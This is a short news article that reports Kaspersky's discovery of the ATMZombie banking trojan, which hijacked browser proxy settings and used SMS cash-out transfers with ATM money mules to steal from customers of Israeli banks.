14 DAY TRIAL // ATMZombie is a new banking trojan discovered by security researchers from Kaspersky that has been seen targeting Israeli banks, the first of its kind to do so.
Detected in November 2015, ATMZombie uses the classic proxy-changing method of sniffing out Web traffic to banking portals, and then, in a second step, requires the cooperation of the person behind this threat and a series of money mules that retrieve the money from ATMs.
ATMZombie trojan hijacks your browser's proxy settings
The proxy-changing method is an old trick for malware developers. It revolves around modifying browser proxy configuration files by replacing the browser's default PAC (Proxy Auto-Config) files.
These malicious PAC files will reroute all the browser's traffic through an intermediary node controlled by the attackers, who will log all the details. To break encrypted HTTPS traffic, ATMZombie also installs its own signed certificates on infected PCs.
Once the data is acquired, the attack enters a "manual mode" stage, specific only to Israeli banks because of a local service that allows the bank account owner to send money to people without bank accounts or credit cards.
Using the stolen credentials, the attacker will log into the account of a victim and send small payments to their money mules. The attacker uses an SMS transaction feature to do so, specific only to Israeli banks.
ATM money mules receive SMS messages from the victim's bank
The mule receives an SMS on their phone, they go to any bank ATM, enter the details and authorization code from the message, and the ATM will pull money from the victim's account, giving it to the money mule.
Kaspersky analysts say that multiple Israeli banks were hit this way, and the criminal gang made hundreds of victims. Luckily, this method does not allow big sum withdrawals, and no payment went above $750 (€690).
The natural conclusion is that the people behind this campaign are local crooks, mainly because they know the subtle intricacies of the local banking scene, and because they use and supervise local ATM money mules, something international criminal gangs tend to avoid.
